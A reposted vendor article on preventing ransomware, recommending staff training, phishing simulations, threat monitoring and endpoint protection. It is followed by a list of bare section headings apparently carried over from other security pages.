It is crucial that businesses are aware of how a ransomware attack may affect their organization, and how they can prevent cybercriminals from breaching their systems and holding sensitive data to ransom. Up to 61% of organizations with security teams consisting of 11–25 employees are said to be most concerned about ransomware attacks.

The NHS could have avoided being impacted by the WannaCry ransomware attack in 2017 by heeding warnings and migrating away from outdated software, ensuring strategies were in place to strengthen their security posture.

It’s essential that your business takes a proactive approach to cybersecurity by implementing the correct tools to help monitor, detect, and mitigate suspicious activity across your network and infrastructure. This will reduce the number and impact of data breaches and cyberattacks.

Defense.com recommend these four fundamental tactics to help prevent ransomware attacks and stay one step ahead of the hackers:1 — Training

Cybersecurity awareness training is pivotal for businesses of all sizes as it helps employees to spot potentially malicious emails or activity.

Social engineering tactics, such as phishing and tailgating, are common and successful due to human error and employees not spotting the risks. It’s vital for employees to be vigilant around emails that contain suspicious links or contain unusual requests to share personal data, often sent by someone pretending to be a senior-level employee.

Security training also encourages employees to query visitors to your offices to prevent ransomware attacks via physical intrusion.

Implementing cybersecurity awareness training will help your business routinely educate and assess your employees on fundamental security practices, ultimately creating a security culture to reduce the risk of data breaches and security incidents.2 — Phishing simulators

These simulator tools support your security awareness training by delivering fake but realistic phishing emails to employees. Understanding how prone your staff are to falling for a real cybercriminal’s tactics allows you to fill gaps in their training.

When you combine phishing simulators with security training, your organization can lessen the chance of falling victim to a ransomware attack. The combination of training and testing puts you in a better position to prevent the cunning attempts of cybercriminals to infiltrate your IT systems and plant malware.3 — Threat monitoring

You can make your business less of a target for cybercriminals by actively monitoring potential threats. Threat Intelligence is a threat monitoring tool that collates data from various sources, such as penetration tests and vulnerability scans, and uses this information to help you defend against potential malware and ransomware attacks. This overview of your threat landscape shows which areas are most at risk of a cyberattack or a data breach.

Being proactive ensures you stay one step ahead of hackers and by introducing threat monitoring tools to your organization, you ensure any suspicious behaviour is detected early for remediation.4 — Endpoint protection

Endpoint protection is key to understanding which of your assets are vulnerable, to help protect them and repel malware attacks like ransomware. More than just your typical antivirus software, endpoint protection offers advanced security features that protect your network, and the devices on it, against threats such as malware and phishing campaigns.

Anti-ransomware capabilities should be included in endpoint protection so it can effectively prevent attacks by monitoring suspicious behaviour such as file changes and file encryption. The ability to isolate or quarantine any affected devices can also be a very useful feature for stopping the spread of malware.

In summary

With ransomware groups continually looking for vulnerabilities to exploit, it’s important that businesses develop robust strategies to prevent ransomware threats: ensure your staff takes regular security awareness training, set up threat monitoring tools to detect and alert you of vulnerabilities, and implement endpoint protection to protect your devices across your network.

Following the above guidelines will increase your chances of safeguarding your business against ransomware attacks that could cost your organization a substantial amount of money and reputational damage.

Defense.com believes world-class cyber protection should be accessible to all companies, regardless of size. For more information, visit Defense.com.

Source :
https://thehackernews.com/2022/08/what-is-ransomware-how-to-defend-your.html

Key Findings:

Overview

Campaign Details and Activity Timeline

2018

2019

2020

2021

2022

Malware Use

Language Use

Notable Campaign Artifacts

Possible Objectives

Conclusion

Indicators of Compromise (IOCs)

Data Shows a Variety of Attack Types

Known Malicious IP Addresses

Known Malicious User-Agents

Directory Traversal

Information Disclosure

File Upload

Conclusion

Encryption and Verification

Ensures Data Integrity

Gains Your Users Trust

Admins can disable it for users stuck behind login prompts

UPDATE HISTORY

EXECUTIVE SUMMARY

INITIAL VECTOR

POST-COMPROMISE TTPS

BACKDOOR ANALYSIS

ATTACK ATTRIBUTION

CISCO RESPONSE AND RECOMMENDATIONS

MITRE ATT&CK MAPPING

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Lateral Movement

Discovery

Command and Control

Exfiltration

INDICATORS OF COMPROMISE

Hashes (SHA256)

IP Addresses

Domains

Email Addresses

A Refresher on Ports

Security Risks Linked to Ports

Vulnerable Ports that Need Your Attention

Ports 20 and 21 (FTP)

Port 22 (SSH)

Port 23 (Telnet)

Port 25 (SMTP)

Port 53 (DNS)

Ports 137 and 139 (NetBIOS over TCP) and 445 (SMB)

Ports 80, 443, 8080 and 8443 (HTTP and HTTPS)

Ports 1433,1434 and 3306 (Used by Databases)

Port 3389 (Remote Desktop)

Tips for Strengthening the Security of Open Ports

1. Patch firewalls regularly.

2. Check ports regularly.

4. Use IDP and IPS tools.

5. Use SSH Keys.

6. Conduct penetration tests and vulnerability assessments.

FAQs

What does a ransomware attack comprise?

Access

Trigger

Demand

Big business for cybercriminals

What is the cost of being targeted by ransomware?

Who is at risk of being a target of ransomware?

How is ransomware deployed?

Phishing attacks

Malvertising

Exploiting vulnerable systems

Four key methods to defend your business against ransomware

In summary